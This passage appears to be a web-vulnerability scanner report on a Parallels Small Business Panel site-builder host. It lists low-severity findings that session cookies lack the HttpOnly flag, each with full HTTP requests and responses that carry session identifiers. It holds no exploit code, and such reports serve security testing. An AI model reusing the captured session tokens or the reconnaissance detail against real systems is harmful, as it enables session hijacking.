Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

3.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/NoCookies  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /NoCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NoCookies HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:40:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>For correct operation of Site Editor, cookies must be enabled in your web browser.</title>
<script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script>
</head>
<body>
<script type="text/javascript">
                   Sb.Cookie.set('testCookie', 'test', '', '/');
                   
                   if ('test' == Sb.Cookie.get('testCookie')) {
                       document.location.href = "/Login";
                   }
               </script><table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0"><tr><td width="100%" height="100%" align="center" valign="middle"><table width="467" border="0" cellpadding="0" cellspacing="0"><tr>
<td width="60"><img src="/images/unsupported_browser/warning_left.gif" alt=""></td>
<td width="400" valign="middle" height="40" align="center" style="background: #EEEEEE; color: #606060; font-family: Verdana; font-size: 11px; font-weight: bold;">For correct operation of Site Editor, cookies must be enabled in your web browser.<br>Please enable cookies in your browser.</td>
<td width="7"><img src="/images/unsupported_browser/warning_right.gif" alt=""></td>
</tr></table></td></tr></table>
</body>
</html>

3.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/UnsupportedBrowser  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /UnsupportedBrowser

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnsupportedBrowser?returnUrl=%2FWizard%2FEdit%2FHtml%3FcurrentPageId%3Dq485ez4jvyq HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=domains; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; SessionID=23074cb14ecc5df3f

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:28:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>The browser is not supported.</title>
<script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script>
</head>
<body>
<script type="text/javascript"><!--
                       function continueAnyway() {
                           Sb.Cookie.set('allowUnsupportedBrowser', 'yes', '', '/');
                           document.location.href = document.getElementById('continueUrl').value;
                       }
                   //--></script><input type="hidden" name="continueUrl" id="continueUrl" value="/Wizard/Edit/Html?currentPageId=q485ez4jvyq"><table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0"><tr><td width="100%" height="100%" align="center" valign="middle"><table width="467" border="0" cellpadding="0" cellspacing="0" style="color: #606060; font-family: Verdana; font-size: 11px; font-weight: bold;">
<tr>
<td width="60"><img src="/images/unsupported_browser/warning_left.gif" alt=""></td>
<td width="400" valign="middle" height="40" align="center" style="background: #EEEEEE;">Unfortunately, your browser is not supported by Site Editor.<br>Please use Internet Explorer 5.5 or later, or Mozilla.</td>
<td width="7"><img src="/images/unsupported_browser/warning_right.gif" alt=""></td>
</tr>
<tr><td colspan="3" align="right" style="padding-top: 10px;"><a href="#" onclick="continueAnyway();">Continue loading the page</a></td></tr>
</table></td></tr></table>
</body>
</html>

3.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:08:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Overview -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Overview');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Overview"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr></tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text"></div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content"><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center">
<tr><td style="height: 100%; vertical-align: middle;padding: 5px 6px 5px 6px" align="center"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr>
<td align="center" style="border-width:0px;width:20%;"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr><td align="center" style="border-width:0px;width:20%;" border="0"><table class="sb-overview-table-inside" style="cursor: pointer; cursor: hand; height: 100%;" cellspacing="0" cellpadding="0" width="100%" border="0" onclick="sbNavigationObject.go('/Wizard/Start');">
<tr>
<td style="width: 10px; height: 7px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_left_top_corner.gif" style="border-width:1px;height:7px;"></td>
<td style="background-repeat: repeat-x; background-position: top right;" background="/skins/WinXPReloadedCompact/images/over_top_line.gif"><div style="width: 130px; height: 1px;"><span></span></div></td>
<td style="width: 10px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_right_top_corner.gif" style="border-width:0px;height:7px;"></td>
</tr>
<tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_left_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/empty.gif" style="border-width:0px;"></td></tr></table></td>
<td height="100%" valign="middle" style="background-repeat: no-repeat; background-position: center left;"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;">
<tr><td height="15%"></td></tr>
<tr><td height="50%" class="sb-overview-title" align="center" valign="top"><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/over_start.gif"></td></tr>
<tr><td height="20%" align="center" valign="top"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><div style="width: 0; height: 80px;"><span></span></div></td>
<td align="center" valign="top" style="vertical-align: top; padding: 5px;">
<span class="sb-overview-title">Start</span><div style="width: 0; height: 10px;"><span></span></div>
<span class="sb-overview-bg sb-text">Select the type of site you would like to create</span>
</td>
</tr></table></td></tr>
<tr><td height="15%"></td></tr>
</table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_right_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_right_arrow.gif" style="border-width:0px;"></td></tr></table></td>
</tr>
<tr>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_left_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
<td style="background-repeat: repeat-x; background-position: bottom right;" background="/skins/WinXPReloadedCompact/images/over_bottom_line.gif"><div style="width: 0; height: 1px;"><span></span></div></td>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_right_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
</tr>
</table></td></tr></table></td>
<td align="center" style="border-width:0px;width:20%;"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr><td align="center" style="border-width:0px;width:20%;" border="0"><table class="sb-overview-table-inside" style="cursor: pointer; cursor: hand; height: 100%;" cellspacing="0" cellpadding="0" width="100%" border="0" onclick="sbNavigationObject.go('/Wizard/Design');">
<tr>
<td style="width: 10px; height: 7px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_left_top_corner.gif" style="border-width:1px;height:7px;"></td>
<td style="background-repeat: repeat-x; background-position: top right;" background="/skins/WinXPReloadedCompact/images/over_top_line.gif"><div style="width: 130px; height: 1px;"><span></span></div></td>
<td style="width: 10px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_right_top_corner.gif" style="border-width:0px;height:7px;"></td>
</tr>
<tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_left_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_left_arrow.gif" style="border-width:0px;"></td></tr></table></td>
<td height="100%" valign="middle" style="background-repeat: no-repeat; background-position: center left;" background="/skins/WinXPReloadedCompact/images/over_left_end_arrow.gif"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;">
<tr><td height="15%"></td></tr>
